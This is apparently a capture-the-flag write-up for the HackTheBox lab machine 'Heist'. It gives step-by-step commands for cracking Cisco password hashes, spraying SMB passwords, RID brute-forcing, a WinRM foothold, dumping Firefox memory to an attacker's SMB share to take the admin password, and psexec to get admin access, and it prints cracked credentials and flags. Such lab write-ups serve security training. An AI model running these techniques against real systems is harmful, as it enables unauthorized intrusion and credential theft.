HackTheBox — Heist

2020-05-16 · HTB Windows

Target: 10.10.10.149

Recon

root@kali:~/htb/heist# gedit /etc/hosts

nmap -sS -sV -A -O -p- 10.10.10.149
nmap -vv 10.10.10.149

We find IIS running on port 80, MSRPC on port 135 and SMB on 445. Additionally, port 5985 (WinRM).

Website

Credential Discovery

Cisco Router Config

hostname ios-1

security passwords min-length 12

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91

username rout3r password 7 0242114B0E143F015F5D1E161713

username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

Crack Type 5 (MD5) Hash

Type 5 password can be cracked via online tools or John:

echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' > cisco5hash
john --fork=4 -w=rockyou.txt cisco5hash

Result: stealth1agent

Crack Type 7 (Cisco VigenÃ¨re) Passwords

Type 7 passwords decrypt instantly via online tools:

0242114B0E143F015F5D1E161713 → $uperP@ssword
02375012182C1A1D751618034F36415408 → Q4)sJu\Y8qz*A3?d

User Enumeration from Website

Enumerating the website surfaces users: Hazard, Support Admin, rout3r, admin

SMB Spray

# Initial spray
python3 cme smb 10.10.10.149 -u user.txt -p passwords.txt

Result: SupportDesk\Hazard:stealth1agent

RID Brute-Force for More Users

python3 cme smb 10.10.10.149 -u Hazard -p stealth1agent --rid-brute

Finds additional users: Chase, Jason

Re-spray with full user + password lists:

python3 cme smb 10.10.10.149 -u user.txt -p passwords.txt

Hit: Chase:Q4)sJu\Y8qz*A3?d

Foothold — WinRM

python3 cme winrm 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'

gem install evil-winrm
ruby evil-winrm.rb -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'

User flag: a127daef77ab6d9d92008653295f59c4

Privesc — Firefox Memory Dump

Firefox is running as Administrator. Dump the process and extract credentials from memory.

get-process -name firefox

# Upload procdump via evil-winrm upload
*Evil-WinRM* PS C:\Users\Chase\Desktop> .\procdump.exe -accepteula -ma 3004 firefox.dmp

Transfer dump to Kali via impacket smbserver, then use strings to extract credentials:

# Kali
./smbserver_linux -smb2support -username guest -password guest share2 ~/htb/heist/

# Target
*Evil-WinRM* PS C:\Users\Chase\Desktop> net use x: \\10.10.14.10\share2 /user:guest guest
cmd /c copy firefox.dmp X:\

*Evil-WinRM* PS C:\Users\Chase\Desktop> ./strings.exe -a firefox.dmp | findstr login_password > what.txt

Extracted credential from Firefox memory:

localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

Password: 4dD!5}x/re8]FBuZ

PSEXEC as Administrator

psexec.py 'administrator:4dD!5}x/re8]FBuZ@10.10.10.149'

Root flag: 50dfa3c6bfd20e2e0d071b073d766897

← Back to posts